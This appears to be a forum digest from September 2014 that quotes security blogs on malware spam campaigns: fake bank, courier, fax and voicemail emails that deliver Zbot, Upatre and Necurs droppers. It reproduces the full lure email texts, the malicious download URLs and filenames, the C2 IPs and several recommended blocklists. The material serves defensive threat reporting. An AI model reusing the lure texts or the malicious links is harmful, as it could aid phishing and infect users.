This is another version of the same upatre zbot downloaders that have been spammed out today with exactly the same payload as 'NatWest You have a new Secure Message – file-4430 – fake PDF malware'*. This 'Nat West BACS Transfer : Remittance for JSAG828GBP' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/natwest-new-secure-message-file-4430-fake-pdf-malware/

- https://www.virustotal.com/en/file/8f0aab0abbbe1519dadff8bc206568b144dfd36b605be090fe3098898e926832/analysis/1410862754/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustotal.com/en/ip-address/188.165.204.210/information/
198.143.152.226: https://www.virustotal.com/en/ip-address/198.143.152.226/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake 'Dhl Delivery' SPAM - contains trojan
- http://blog.mxlab.eu/2014/09/16/fake-email-fwd-dhl-delivery-attempt-contains-trojan/
Sep 16, 2014 - "... intercepted a new trojan distribution campaign by email with the subject 'Fwd: Dhl Delivery Attempt (Invoice Documents)'. This email is sent from the spoofed address 'enquiry@ dhl .com' and has the following body:
We attempted to deliver your item at 17:32pm on Sept 15th, 2014.
The delivery attempt failed because nobody was present at the shipping address, so this notification has been automatically generated.
You may rearrange delivery by visiting the link on the attached document or pick up the item at the DHL depot/office indicated on the receipt attached.
If the package is not rescheduled for delivery or picked up within 48 hours, it will be returned to the sender.
Airway Bill No: 7808130095
Class: Package Services
Service(s): Delivery Confirmation
Status: eNotification sent
Print this label to get this package at our depot/office.
Thank you
© 2014 Copyright© 2013 DHL. All Rights Reserved...

The attached ZIP file has the name DHL EXPRESS DELIVERY ATTEMPT.zip and contains the 293 kB large file DHL EXPRESS DELIVERY ATTEMPT.exe. The trojan is known as Trojan/Win32.Necurs, a variant of Win32/Injector.BLYN, W32/Injector.GLA!tr, Backdoor.Bot or Win32.Trojan.Bp-generic.Ixrn. At the time of writing, 6 of the 55 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/57d37614dd81d48c25bec02f4481e1757cd7a5b84ccc31904635a51d70db1a44/analysis/1410870424/

:fear::fear: :mad:

FYI...

Fake FAX SPAM - malware
- http://blog.dynamoo.com/2014/09/youve-received-new-fax-no-you-havent.html
17 Sep 2014 - "This tired old spam format comes with warmed-over malware attachment.
From: Fax [fax@ victimdomain .com]
Date: 17 September 2014 09:32
Subject: You've received a new fax
New fax at SCAN6405035 from EPSON by https ://victimdomain .com
Scan date: Wed, 17 Sep 2014 16:32:29 +0800
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...
(Google Disk Drive is a file hosting service operated by Google, Inc.)

The link in the email downloads an archive file Message_Document_pdf.zip from the same estudiocarraro .com .br site. This has a VirusTotal detection rate of 3/54*. The ThreatTrack report shows that the malware attempts to phone home to:
denis-benker .de/teilen/1709uk1.hit
188.165.204.210/1709uk1/NODE01/0/51-SP3/0/
188.165.204.210/1709uk1/NODE01/1/0/0/
188.165.204.210/1709uk1/NODE01/41/5/4/
Recommended blocklist:
188.165.204.210
denis-benker .de
estudiocarraro .com.br"
* https://www.virustotal.com/en-gb/file/01e69a84cd47f38786affe7348fb334f2092984fa11444352ee5a0431c505f6d/analysis/1410943351/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en-gb/ip-address/137.170.185.211/information/

188.165.204.210: https://www.virustotal.com/en-gb/ip-address/188.165.204.210/information/
___

Fake ADP Invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/adp-invoice-pdf-malware/
17 Sep 2014 - "'ADP Invoice' pretending to come from billing.address.updates@ adp .com is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... we always say don’t open any attachment or file sent to you in an email, but with fake or malicious PDF files that is quite difficult.

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/adp-invoice-with-malicious-pdf.png

17 September 2014: adp_invoice_46887645.pdf
Current Virus total detections: 8/55* . This ADP Invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2653224f479aa10f4e82b489987bb519f563786b676bacb76a5efba2963cd546/analysis/1410974477/
___

Android Malware uses SSL for Evasion
- http://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-use-ssl-for-evasion/
Sep 17, 2014 - "... a double-edged sword. Android malware is now utilizing SSL to hide their routines and to evade detection. SSL servers have become a target of Android malware. Malware can use any of the three types of servers... This malware steals user and device information, such as the IMEI, phone number, and images stored in the SD card. Whenever the user starts the app or once the phone reboots, the app will start a backend service to dump the aforementioned information and use a hard-coded Gmail account and password to send the information to a particular email address... ANDROIDOS_TRAMP.HAT attempts to disguise itself as an official Google service. It collects user information like the phone number, location, and contact list. Upon execution, it registers GCMBroadCastReceiver. The malicious app will then post the -stolen- data via Google Cloud Messaging. Google Cloud Messaging is used for C&C communication of the malicious app. Commands such as “send message,” “block call,” and “get current location” are sent and received via Google Cloud Messaging... ANDROIDOS_BACKDOORSNSTWT.A triggers its C&C attack through Twitter. The malware crawls for Twitter URLs and combine the obtained information with a hard-coded string to generate a new C&C URL for attacks. The stolen information is sent to the generated URL... Cybercriminals may have also targeted SSL servers and services because because they do not need to exert much effort into gaining access to these sites. They can do so via normal and legal means, such as buying a virtual host from web-hosting services or registering a new account on Twitter. Should we see more use (and abuse) of SSL, detecting malicious apps may not be enough. Collaboration with server providers and services will be needed in removing related URLs, email addresses, and the like. Given the constant evolution of Android malware, we advise users to download Android apps only from legitimate sources. Third-party app stores may not be as strict when it comes to scanning for potentially malicious apps. We also advise users to use a security solution that can detect and block threats that may cause harm to mobile devices..."
(More detail at the trendmicro URL above.)
___

Fake UKFast invoice SPAM – malware attachment
- http://myonlinesecurity.co.uk/ukfast-invoice-fake-pdf-malware/
17 Sep 2014 - "'UKFast invoice' pretending to come from UKFast Accounts <accounts@ ukfast .co.uk>is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The subject line and the to: lines on these emails are blank...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/ukfast-invoice.png

17 September 2014: Invoice-17009106-001.zip ( 137 kb): Extracts to: Invoice 17009106-001.exe
Current Virus total detections: 0/55* . This UKFast invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/200ef318f11db4e3975159b378a48bf2d6420c3a48d7f4c75efe1cb2acbc22b8/analysis/1410939664/
___

Fake Invoice SPAM ...
- http://myonlinesecurity.co.uk/strabane-weekly-news-inv0071981-newspaper-copy-fake-pdf-malware/
17 Sep 2014 - "'Strabane Weekly News INV0071981 – Newspaper copy' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... - same- malware as one version of today’s UKFast invoice – fake PDF malware*... The email looks like:
Dear Sir,
Please find attached the copy of the advert for INV0071981 in the Strabane Weekly News.
Thank you,
Darragh

This 'Strabane Weekly News INV0071981 – Newspaper copy' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/ukfast-invoice-fake-pdf-malware/

:fear: :mad:

FYI...

Fake NatWest SPAM - malware attached
- http://blog.dynamoo.com/2014/09/important-new-account-invoice-spam.html
18 Sep 2014 - "This -fake- NatWest invoice (since when did banks send invoices?) leads to a malicious ZIP file.
From: NatWest Invoice [invoice@ natwest .com]
Date: 18 September 2014 11:06
Subject: Important - New account invoice
Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
To view/download your invoice please click here or follow the link below ...
Thank you for choosing NatWest...

The link in this particular email goes to bnsoutlaws .co.uk/qvgstopmdi/njfeziackv.html which then downloads a ZIP file from bnsoutlaws .co.uk/qvgstopmdi/Account_Document.zip which in turn contains a malicious executable Account_Document.scr which has a VirusTotal detection rate of just 1/53*. The ThreatTrack report [pdf] shows that the malware attempts to call home...
Recommended blocklist:
188.165.204.210
liverpoolfc .bg
bnsoutlaws .co.uk "
* https://www.virustotal.com/en-gb/file/9202af35dbf5620096a42766582f231654c74677ee3dcb70a5af6d178fcc0163/analysis/1411032337/
... Behavioural information
TCP connections
91.215.216.52: https://www.virustotal.com/en-gb/ip-address/91.215.216.52/information/
188.165.204.210: https://www.virustotal.com/en-gb/ip-address/188.165.204.210/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en-gb/ip-address/137.170.185.211/information/

UPDATE: The -same- malware is also being pushed by a fake Lloyds Bank email..
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 18 September 2014 11:45
Subject: Important - Commercial Documents
Important account documents
Reference: C146
Case number: 68819453
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file) ...

- http://myonlinesecurity.co.uk/nat-west-important-new-account-invoice-fake-pdf-malware/
18 Sep 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/Nat-West-New-account-invoice.png
___

Fake eFax SPAM - PDF malware
- http://myonlinesecurity.co.uk/efax-report-fake-pdf-malware/
18 Sep 2014 - "'eFax Report' pretending to come from eFax Report <noreply@ efax-reports .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
INCOMING FAX REPORT
Date/Time: Thursday, 18.09.2014
Speed: 353bps
Connection time: 08:02
Page: 4
Resolution: Normal
Remote ID: 611-748-177946
Line number: 3
DTMF/DID:
Description: Internal only ...

18 September 2014: fax-id9182719182837529.zip ( 189 kb): Extracts to: fax-id9182719182837529.scr
Current Virus total detections: 1/54* . This eFax Report is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5a6c3fdd158c157b0c7e4293ad0a56b8ef2b2ececd68b4c075fc4b8cc16f6922/analysis/1411049220/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Line Voice Message Spam
- http://threattrack.tumblr.com/post/97827881718/line-voice-message-spam
18 Sep 2014 - "Subjects Seen:
You have a voice message
Typical e-mail details:
LINE Notification
You have a voice message, listen it now.
Time: 21:12:45 14.10.2014, Duration: 45sec

Malicious URLs:
iagentnetwork .com/sql.php?line=gA7EF9bA7ns68jJ0eBi8ww
Malicious File Name and MD5:
LINE_Call_<phone number>.zip (7FC6D33F62942B55AD94F20BDC7A3797)
LINE_Call_<phone number>.exe (C3E0F4356A77D18438A38110F8BD919E)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/ad77337f36ff7e57db548378c0b961b2/tumblr_inline_nc4325Jmds1r6pupn.png

Tagged: Line.me, Kuluoz

147.202.201.24: https://www.virustotal.com/en/ip-address/147.202.201.24/information/

:mad: :fear::fear:

FYI...

Fake 'voice mail' SPAM ...
- http://blog.dynamoo.com/2014/09/this-fake-voice-mail-message-leads-to.html
19 Sep 2014 - "This -fake- voice mail message leads to malware:
From: Microsoft Outlook [no-reply@ victimdomain .com]
Date: 19 September 2014 11:59
Subject: You have received a voice mail
You received a voice mail : VOICE976-588-6749.wav (25 KB)
Caller-Id: 976-588-6749
Message-Id: D566Y5
Email-Id: <REDACTED>
Download and extract to listen the message.
We have uploaded voicemail report on dropbox, please use the following link to download your file...
Sent by Microsoft Exchange Server

The link in the email messages goes to www .prolococapena .com/yckzpntfyl/mahlqhltkh.html first and then downloads a file from www .prolococapena .com/yckzpntfyl/Invoice102740_448129486142_pdf.zip which contains exactly the -same- malicious executable being pushed in this earlier spam run*."
* http://blog.dynamoo.com/2014/09/natwest-statement-spam-yet-again.html
19 Sep 2014 - "... shows network activity to hallerindia .com on 192.185.97.223. I would suggest that this is a good domain to -block- ..."
Screenshot: https://2.bp.blogspot.com/-Oo5Lnrowt70/VBwJo-dVgRI/AAAAAAAAFpY/TzfWXXSEP88/s1600/natwest.png

192.185.97.223: https://www.virustotal.com/en/ip-address/192.185.97.223/information/

- http://myonlinesecurity.co.uk/natwest-statement-fake-pdf-malware/
19 Sep 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/nat-west-statement.png
Current Virus total detections: 1/54*
* https://www.virustotal.com/en/file/a56ef62b4154849c04b28dd78ff2d4d383c98eb7e38785c10e9b58932f3dc0ca/analysis/1411120481/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake 'Police Suspect' SPAM - PDF malware
- http://myonlinesecurity.co.uk/city-london-police-homicide-suspect-fake-pdf-malware/
19 Sep 2014 - "'City of London Police Homicide Suspect' pretending to come from City of London Police is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Bulletin Headline: HOMICIDE SUSPECT
Sending Agency: London City Police
Sending Location: GB – London – London City Police
Bulletin Case#: 14-62597
Bulletin Author: BARILLAS #1169
Sending User #: 92856
APBnet Version: 684593
The bulletin is a pdf attachment to this email.
The Adobe Reader (from Adobe .com) will display and print the bulletin best.
You can Not reply to the bulletin by clicking on the Reply button in your email software.

Of course it is -fake- and -not- from any Police force or Police service in UK or worldwide.
19 September 2014: Homicide-case#15808_pdf.zip : Extracts to: Homicide-case#15808_pdf.exe
Current Virus total detections: 4/55* . This 'City of London Police Homicide Suspect' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ae7f419e0093fd2d4892ea6920aaa2c12c95cede9c97cb0a1f096496d4ff93ea/analysis/1411120670/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustotal.com/en/ip-address/188.165.204.210/information/
192.185.97.223: https://www.virustotal.com/en/ip-address/192.185.97.223/information/
___

Fake 'Courier Svc' SPAM - PDF malware
- http://myonlinesecurity.co.uk/tnt-courier-service-tnt-uk-limited-package-tracking-fake-pdf-malware/
19 Sep 2014 - "'TNT UK Limited Package tracking' pretending to come from TNT COURIER SERVICE <tracking@tnt.co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
TNT COURIER SERVICE (TCS)
Customer/Delivery Services Department
Central Pk Est/Mosley Rd, Trafford Park
Manchester, M17 1TT UK.
DETAILS OF PACKAGE
Reg order no: 460911612900
Your package have been picked up and is ready for dispatch.
Connote # : 460911612900
Service Type : Export Non Documents – Intl
Shipped on : 18 Sep 14 12:00
Order No : 4240629
Status : Driver’s Return
Description : Wrong Address
Service Options: You are required to select a service option below.
The options, together with their associated conditions.
Please check attachment to view information about the sender and package.

19 September 2014: Label_GB1909201488725UK_pdf.zip: Extracts to: Label_GB1909201488725UK_pdf.exe
Current Virus total detections: 5/55* . This 'TNT UK Limited Package tracking' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ae7f419e0093fd2d4892ea6920aaa2c12c95cede9c97cb0a1f096496d4ff93ea/analysis/1411121703/
... Behavioural information
DNS requests
hallerindia .com (192.185.97.223)
TCP connections
188.165.204.210: https://www.virustotal.com/en/ip-address/188.165.204.210/information/
192.185.97.223: https://www.virustotal.com/en/ip-address/192.185.97.223/information/
___

Bitcoin Ponzi scheme ...
- http://www.reuters.com/article/2014/09/19/us-sec-bitcoin-fraud-idUSKBN0HE1Z820140919
Sep 19, 2014 - "A U.S. federal judge in Texas ordered Bitcoin Savings and Trust and its owner to pay a combined $40.7 million after the Securities and Exchange Commission established that the company, which sold investments using the virtual currency, was a Ponzi scheme. In a decision dated Thursday, U.S. Magistrate Judge Amos Mazzant said Trendon Shavers "knowingly and intentionally" operated his company "as a sham and a Ponzi scheme," misleading investors about the use of their bitcoin, how he would generate promised returns and the safety of their investments... The SEC said Shavers used the online moniker "pirateat40" to raise more than 732,000 bitcoin from February 2011 to August 2012, promising investors up to 7 percent in weekly interest to be paid based on his ability to trade the currency. But according to the decision, Shavers used new bitcoin to repay earlier investors, diverted some to personal accounts at the now-bankrupt Mt. Gox exchange and elsewhere, and spent some investor funds on rent, food, shopping and casino visits..."
___

Apple Phish ...
- https://isc.sans.edu/diary.html?storyid=18669
2014-09-18 23:58:53 UTC - "... this in this morning:
Dear Client,
We inform you that your account is about to expire in less 48 hours, it's imperative to update your information with our audit forms, otherwise your session and/or account will be a limited access.
just click the link below and follow the steps our request form
Update now...
This is an automatically generated message. Thank you not to answer. If you need help, please visit the Apple Support.
Apple Client Support.

A variation on the -many- phishing emails we see regularly, just taking advantage of two public events, the celebrity photos and the release of the new phone. Maybe a reminder to staff as well as friends and family to -ignore- emails that say "click here" ..."
___

Hack the ad network like a boss...
- https://www.virusbtn.com/blog/2014/08_15.xml
4 Sep 2014 - "... Exploit kits have been the scourge of the web for many years. Typically starting with a single line of inserted code, they probe for a number of vulnerabilities in the browser or its plug-ins and use this to drop malware onto the victim's machine. Given the high proportion of Internet users that haven't fully patched their systems, it is a successful way to spread malware.
> https://www.virusbtn.com/images/news/general_malicious_ads.png
... in order for exploit kits to do their work, a vulnerable website must first be infected, or the user must be enticed into clicking a malicious link. But by purchasing ad space, and using this to place malicious ads, attackers have discovered a cheap and effective way to get their malicious code to run inside the browser of many users. They can even tailor their advertisements to target specific languages, regions or even website subjects... We learned last month that this is a serious problem - when researchers found that cybercriminals had purchased advertising space on Yahoo in order to serve the 'Cryptowall' ransomware.
> https://www.virusbtn.com/images/news/youtube_malicious_ads.png
Ideally... advertising networks would block malicious ads as they are added to their systems... this is easier said than done: given the size of such networks, it would take a lot of time and resources - plus, technically, it's difficult to block most malicious ads without a certain percentage of false positives..."

:fear::fear: :mad:

FYI...

Fake gov't SPAM
- http://blog.dynamoo.com/2014/09/your-online-gatewaygovuk-submission-spam.html
22 Sep 2014 - "This -fake- spam from the UK Government Gateway leads to malware:

Screenshot: https://4.bp.blogspot.com/-O44byyBpvKE/VCACHn_z67I/AAAAAAAAFro/5VfC-5YRsOw/s1600/gateway.png

The link in the email does -not- go to gateway .gov.uk at all, but in this case the the link goes to the following:
http ://maedarchitettura .it/wfntvkppqi/wnazvamlzv.html ->
http ://www .maedarchitettura .it/wfntvkppqi/wnazvamlzv.html ->
http ://maedarchitettura .it/wfntvkppqi/GatewaySubmission.zip
The ZIP file contains a malicious executable GatewaySubmission.exe which has a VirusTotal detection rate of 1/55*. The Anubis report** shows that it attempts to make a connection to ruralcostarica .com which is probably worth blocking."
* https://www.virustotal.com/en-gb/file/146272b3c4119591adb7fd3f032a6f810a4bd8bd62109792eece587a0ac5c41d/analysis/1411383282/

184.168.152.32: https://www.virustotal.com/en-gb/ip-address/184.168.152.32/information/

** https://anubis.iseclab.org/?action=result&task_id=19b13cf14c76380345d98780f5ac50f82&format=html

- http://myonlinesecurity.co.uk/online-gateway-gov-uk-submission-fake-pdf-malware/
22 Sep 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/Your-online-Gateway.gov_.uk-Submission.png
...
> https://www.virustotal.com/en-gb/file/146272b3c4119591adb7fd3f032a6f810a4bd8bd62109792eece587a0ac5c41d/analysis/1411381013/
___

Fake 'LogMeIn' SPAM – malware
- http://myonlinesecurity.co.uk/september-22-2014-logmein-security-update-malware/
22 Sep 2014"'September 22, 2014 LogMeIn Security Update' pretending to come from LogMeIn .com <auto-mailer@ logmein .com>is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Dear client,
We are pleased to announce that LogMeIn has released a new security certificate.
It contains new features:
• The certificate will be attached to the computer of the account holder, which will prevent any fraud activity
• Any irregular activity on your account will be detected by our security department
• This SSL security certificate patches the “Heartbleed” bug discovered earlier this year
Download the attached certificate. Update will be automatically installed by double click.
As always, your Logmein Support Team is happy to assist with any questions you may have.
Feel free to contact us ...

22 September 2014: cert_client.zip (66 kb): Extracts to: cert.scr
Current Virus total detections: 2/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a large blue i instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a3cf855b9bfbb17e4e293c6d28290de4329338a988b5c6a33e35e7bc6f3b0c3b/analysis/1411400614/
... Behavioural information
DNS requests
icanhazip .com (23.253.218.205)
www .download .windowsupdate .com (95.101.0.104): https://www.virustotal.com/en/ip-address/95.101.0.104/information/
t54cjs4qc2r4bn63 .tor2web .org (65.112.221.20): https://www.virustotal.com/en/ip-address/65.112.221.20/information/
TCP connections
23.253.218.205: https://www.virustotal.com/en/ip-address/23.253.218.205/information/
95.101.0.83: https://www.virustotal.com/en/ip-address/95.101.0.83/information/
38.229.70.4: https://www.virustotal.com/en/ip-address/38.229.70.4/information/

- https://isc.sans.edu/diary.html?storyid=18695
2014-09-22
Screenshot: https://isc.sans.edu/diaryimages/images/Screen%20Shot%202014-09-22%20at%2011_34_06%20AM.png
...
> https://www.virustotal.com/en/file/a3cf855b9bfbb17e4e293c6d28290de4329338a988b5c6a33e35e7bc6f3b0c3b/analysis/
File name: cert.scr.exe
Detection ratio: 3/51
... Behavioural information
DNS requests
icanhazip .com (23.253.218.205): https://www.virustotal.com/en/ip-address/23.253.218.205/information/
www .download.windowsupdate .com (95.101.0.104): https://www.virustotal.com/en/ip-address/95.101.0.104/information/
t54cjs4qc2r4bn63 .tor2web .org (65.112.221.20): https://www.virustotal.com/en/ip-address/65.112.221.20/information/
TCP connections
23.253.218.205: https://www.virustotal.com/en/ip-address/23.253.218.205/information/
95.101.0.83: https://www.virustotal.com/en/ip-address/95.101.0.83/information/
38.229.70.4: https://www.virustotal.com/en/ip-address/38.229.70.4/information/
___

Fake USAA SPAM - PDF malware
- http://myonlinesecurity.co.uk/usaa-policy-renewal-please-print-auto-id-cards-pdf-malware/
22 Sep 2014 - "'USAA Policy Renewal – Please Print Auto ID Cards' pretending to come from USAA <USAA.Web.Services@customermail.usaa.com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/USAA-Policy-Renewal-Please-Print-Auto-ID-Cards.png

22 September 2014: id_card.pdf - Current Virus total detections: 11/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/644635d9cebfd696dd0e71eefce400ac744713b846ef3fb2df8268a1b48cd4cc/analysis/1411415107/

- http://threattrack.tumblr.com/post/98225075443/usaa-insurance-card-spam
23 Sep 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/37ba5ffb65ea0fbf4857f1d0fee84e0b/tumblr_inline_nccw5e1ERc1r6pupn.png
Tagged: USAA, CVE-2013-2729, Upatre, PDFExploit
___

Fake 'RBC Invoice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/rbc-invoices-pdf-malware/
22 Sep 2014 - "'RBC Invoices' pretending to come from RBC Express <ISVAdmin@ rbc .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please review the attached invoices and pay them at your earliest convenience. Feel free to contact us if you have any questions.
Thank you.

22 September 2014: invoice058342.pdf . Current Virus total detections: 10/54* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/644635d9cebfd696dd0e71eefce400ac744713b846ef3fb2df8268a1b48cd4cc/analysis/1411409482/
___

Fake 'Payment Advice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/hsbc-payment-advice-issued-fake-pdf-malware/
22 Sep 2014 - "'HSBC Payment Advice Issued' pretending to come from HSBC Bank UK <payment.advice@ hsbc .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment or follow the link in the email... The email looks like:
Your payment advice is issued at the request of our customer. The advice is for your reference only.
Please download your payment advice at ...
Yours faithfully,
Global Payments and Cash Management
This is an auto-generated email, please DO NOT REPLY. Any replies to this email will be disregarded.

... this drops a slightly different malware paymentadvice .exe with a current VT detections 0/53* . This HSBC Payment Advice Issued is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/844c016c9df09432f82f2a353151ca110c2474c7cb5f09c54ebc64952dd1174d/analysis/1411386112/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake Invoice SPAM
- http://myonlinesecurity.co.uk/peter-hogarth-sons-ltd-invoice-642555-fake-pdf-malware/
22 Sep 2014 - "'PETER HOGARTH & SONS LTD Invoice 642555' pretending to come from john.williamson@ peterhogarth .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please find attached your Invoice(s)/Credit(s)
PETER HOGARTH & SONS LTD
INDUSTRIAL HYGIENE and PROTECTION
Tel: 01472 345726 | Fax: 01472 250272 | Web...
Estate Road No. 5, South Humberside Industrial Estate, Grimsby, North East Lincolnshire, DN31 2UR
Peter Hogarth & Sons Ltd is a company registered in England.
Company Registration Number: 1143352...

22 September 2014: Attachment.zip (230 kb): Extracts to: Invoice 77261990001.PDF.exe
Current Virus total detections: 3/53* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/809f5007e7e771dbb791d08e166770b17c2de15908b300ef1a241ac9f23215d3/analysis/1411380202/
___

European banks / Europol in cybercrime fightback
- http://www.reuters.com/article/2014/09/22/banks-cybersecurity-europe-idUSL6N0RN1WO20140922
Sep 22, 2014 - "Europe's banks have joined forces with Europol's cybercrime unit to try to combat the rising and increasingly sophisticated threat being posed by cyber criminals to financial firms. The European Banking Federation (EBF), which represents about 4,500 banks, and Europol's European Cybercrime Centre - known as EC3 - said on Monday they had signed a memorandum of understanding to intensify cooperation between law enforcement and the financial sector. Banks are facing frequent attacks from sophisticated hackers. Wall Street bank JP Morgan said last month it was working with U.S. law enforcement authorities to investigate a possible cyber attack, and Royal Bank of Scotland and its UK peers have suffered serious attacks by hackers that have disrupted systems... Cybercrime attacks faced by banks include coordinated attempts to disrupt websites, payment card fraud, and attempts to infiltrate systems to steal money. The agreement between the EBF, which is a federation of 32 national banking lobby groups, and EC3, which links cybercrime divisions of police forces in EU countries, will allow them to exchange know-how, statistics and strategic information. Banks are typically working closely with national police forces to fight cybercrime, and the new agreement should widen that across Europe..."

:mad: :fear:

FYI...

Fake 'Voice Mail' SPAM
- http://blog.dynamoo.com/2014/09/according-to-this-spam-you-have-new.html
23 Sep 2014 - "This strangely titled spam leads to malware.
From: Voice Mail
Date: 23 September 2014 10:17
Subject: You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs8213783583_001
The transmission length was 78
Receiving machine ID : R8KU-UY0G3-ONGH
To download and listen your voice mail please follow the link ...
The link to this secure message will expire in 24 hours ...

The link in the email downloads a file from www .ezysoft .in/ocjnvzulsx/VoiceMail.zip which contains a malicious executable VoiceMail.scr which has a VirusTotal detection rate of 2/54*. According to this Anubis report** the malware attempts to phone home to very-english .co.uk which might be worth blocking."
* https://www.virustotal.com/en-gb/file/2008078314022b0bf08cc1e2a23420ec4f7caab95e00e020ecf07b7c01dbfa35/analysis/1411464313/

** http://anubis.iseclab.org/?action=result&task_id=1ac4290d6f92ed1044d41585aeff6b27a&format=html

- http://myonlinesecurity.co.uk/new-voice-fake-pdf-malware/
23 Sep 2014 - "... 23 Sep 2014: VoiceMail.zip (9kb): Extracts to: VoiceMail.scr Current Virus total detections: 2/54*
* https://www.virustotal.com/en-gb/file/2008078314022b0bf08cc1e2a23420ec4f7caab95e00e020ecf07b7c01dbfa35/analysis/1411464313/
___

jQuery.com compromised to serve malware via drive-by download
- http://www.net-security.org/malware_news.php?id=2869
